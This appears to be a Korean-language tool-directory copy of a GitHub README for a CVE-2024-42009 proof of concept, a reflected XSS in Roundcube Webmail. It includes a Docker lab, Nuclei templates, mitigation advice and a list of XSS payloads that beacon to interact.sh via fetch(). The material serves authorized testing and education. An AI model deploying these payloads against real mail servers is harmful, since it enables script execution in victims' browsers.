Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-42009 | Kitploit
도구/GitHubGitHub/shubhankargupta691/cve-2024-42009
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubshubhankargupta691/cve-2024-42009

CVE-2024-42009

저장소 보기
11개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-42009 – Roundcube Webmail의 반사형 XSS

📌 개요

이 저장소는 Nuclei 템플릿과 보조 리소스를 포함하여 CVE-2024-42009를 안전하게 시연하고 검증하기 위해 설계된 자료입니다. 이 취약점은 Roundcube Webmail의 치명적인 반사형 XSS(Reflected Cross-Site Scripting)로, show.php의 message_body() 함수에서 발생합니다. 이 결함은 살균(sanitization) 이후의 수정 작업이 살균을 무력화(desanitization)시키고 조작된 HTML 이메일 콘텐츠를 안전하지 않게 렌더링하도록 만드는 데 있습니다.

⚠️ 이 PoC는 교육 및 인가된 테스트 용도로만 제작되었습니다. 소유하지 않았거나 명시적 테스트 권한이 없는 시스템에는 사용하지 마십시오.


🧠 취약점 요약

  • CVE ID: CVE-2024-42009
  • 심각도: 치명적(CVSS 9.8)
  • 영향받는 버전: Roundcube ≤ 1.6.7 및 ≤ 1.5.7
  • 패치된 버전: 1.6.8 및 1.5.8
  • 취약 구성 요소: show.php의 message_body()
  • 영향: 사용자가 악성 이메일을 열람할 때 임의 JavaScript 실행

🧪 탐지 전략(실습실 전용)

이 저장소는 통제된 실습 환경에서 JavaScript 실행을 확인하기 위해 Interactsh를 통한 대역 외(Out-of-Band, OOB) 탐지를 사용합니다.

주요 단계:

  1. 취약한 Roundcube 인스턴스 배포(예: Docker 사용)
  2. onanimationstart 및 Interactsh 비콘(beacon)이 포함된 <body> 태그로 조작된 이메일 전송
  3. Roundcube UI에서 이메일 열람
  4. Interactsh 도메인으로의 DNS/HTTP 콜백 확인

🐳 실습 환경 구성

제공된 Docker Compose 파일을 사용하여 MailHog(SMTP 싱크) 및 MariaDB와 함께 로컬 Roundcube 인스턴스를 실행하십시오.

root@kitploit:~
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
  • Roundcube UI: http://localhost:8080
  • MailHog UI: http://localhost:8025
  • 로그인 방식: Google 계정

⚠️ 본인의 Google 계정을 사용하지 마십시오.


📁 저장소 구성 내용

  • CVE-2024-42009-OOB.yaml – Interactsh 및 대역 외(OOB) 탐지를 포함한 Nuclei 템플릿
  • CVE-2024-42009.yaml – Interactsh 및 OOB가 없는 Nuclei 템플릿
  • docker-compose.yml – Roundcube Webmail 실습 환경 구성
  • Images/ – Interactsh의 HTTP/DNS 히트를 보여주는 스크린샷

🎥 동영상 시연

이 동영상은 전체 익스플로잇 체인을 안내합니다:

  • 페이로드 제작
  • 이메일 또는 엔드포인트를 통한 전송
  • 취약점 트리거
  • Interactsh를 통한 비콘 확인

(동영상 데모)


이러한 XSS 페이로드를 README에 책임감 있게 포함하려면 교육 또는 테스트 목적임을 명확히 표시한 섹션에 배치해야 합니다. 다음은 제안된 구조입니다:


🧪 XSS 페이로드 예시(테스트 목적 전용)

⚠️ 고지 사항: 이 페이로드는 교육 목적 및 인가된 보안 테스트에만 사용하기 위한 것입니다. 명시적 권한 없이 시스템에 배포하지 마십시오.

root@kitploit:~
<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">

<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/HEAD/x" onerror="fetch('https://interact.sh/hit')">

<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>

<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>

<!-- JavaScript in iframe src -->

🧭 사용 방법

  • https://interact.sh/hit를 자신의 리스너 엔드포인트로 교체하십시오.
  • 로컬 실습 환경이나 CTF 플랫폼과 같은 통제된 환경에서 사용하십시오.
  • 실행 여부를 검증하기 위해 엔드포인트에서 수신 요청을 모니터링하십시오.

🛡️ 완화 조치

Roundcube를 다음 버전으로 업그레이드하십시오:

  • 1.6.8 또는 1.5.8
    이 버전들은 취약한 후처리 로직을 제거하고 더 엄격한 살균 및 CSP 헤더를 적용합니다.

📜 참고 자료

다음은 CVE-2024-42009에 대한 README 또는 이메일 제출물에 포함할 수 있는 깔끔하고 전문적인 참고 자료 섹션입니다. 나열된 모든 출처를 명확성과 신뢰성을 위해 형식화하여 인용합니다:


📚 참고 자료

  • NVD CVE 항목 – CVE-2024-42009 – CVSS 점수 및 영향받는 버전이 포함된 공식 취약점 목록
  • SonarSource 블로그 – 정부 이메일 위험 노출 – 심층 기술 분석 및 익스플로잇 분석
  • DaniTheHack3r의 GitHub PoC – 이메일 리스너 및 애니메이션 트리거 페이로드를 갖춘 Python 기반 익스플로잇
  • Bhanunamikaze의 GitHub PoC – HTTP 리스너를 통한 자동화된 페이로드 주입 및 데이터 유출
  • 0xbassiouny1337의 GitHub PoC – 실시간 이메일 캡처 및 디코딩을 통한 저장형 XSS 익스플로잇
도구 다운로드